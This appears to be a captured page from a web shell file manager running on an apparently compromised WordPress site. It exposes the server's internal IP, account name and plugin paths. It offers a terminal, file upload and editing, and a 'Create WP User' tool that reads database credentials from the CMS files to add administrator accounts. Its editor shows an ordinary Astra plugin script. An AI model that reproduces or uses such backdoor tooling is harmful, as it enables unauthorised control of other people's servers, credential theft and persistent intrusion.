Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
www
/
wordpress
/
wpn_budomat
/
wp-content
/
plugins
/
astra-sites
/
inc
/
assets
/
js
/
src
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
content.js
501.00 B
-rw-r--r--
2021-04-01 19:37
frame.js
1.63 KB
-rw-r--r--
2021-04-01 19:37
index.js
2.64 KB
-rw-r--r--
2021-04-01 19:37
search.js
2.23 KB
-rw-r--r--
2021-04-01 19:37
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
frame.js
var Frame = wp.media.view.Frame, AstraAttachmentsBrowser; wp.media.view.AstraContent = require( './content.js' ); AstraAttachmentsBrowser = Frame.extend({ tagName: 'div', className: 'attachments-browser ast-attachments-browser', images : [], object: [], initialize: function() { _.defaults( this.options, { filters: false, search: true, date: true, display: false, sidebar: true, AttachmentView: wp.media.view.Attachment.Library }); // Add a heading before the attachments list. this.createContent(); }, createContent: function() { this.attachmentsHeading = new wp.media.view.Heading( { text: astraImages.title, level: 'h3', className: 'ast-media-views-heading' } ); // this.views.add( this.attachmentsHeading ); this.views.add( new wp.media.view.AstraContent ); this.$el.find( '.ast-image__search' ).wrapAll( '<div class="ast-image__search-wrap">' ).parent().html(); this.$el.find( '.ast-image__search-wrap' ).append( '<span class="ast-icon-search search-icon"></span>' ); }, photoUploadComplete: function( savedImage ) { if ( savedImage && savedImage.attachmentData) { this.model.frame.content.mode("browse") this.model.get("selection").add( savedImage.attachmentData ) this.model.frame.trigger("library:selection:add") this.model.get("selection") jQuery(".media-frame .media-button-select").click() } } }); module.exports = AstraAttachmentsBrowser;
关闭
保存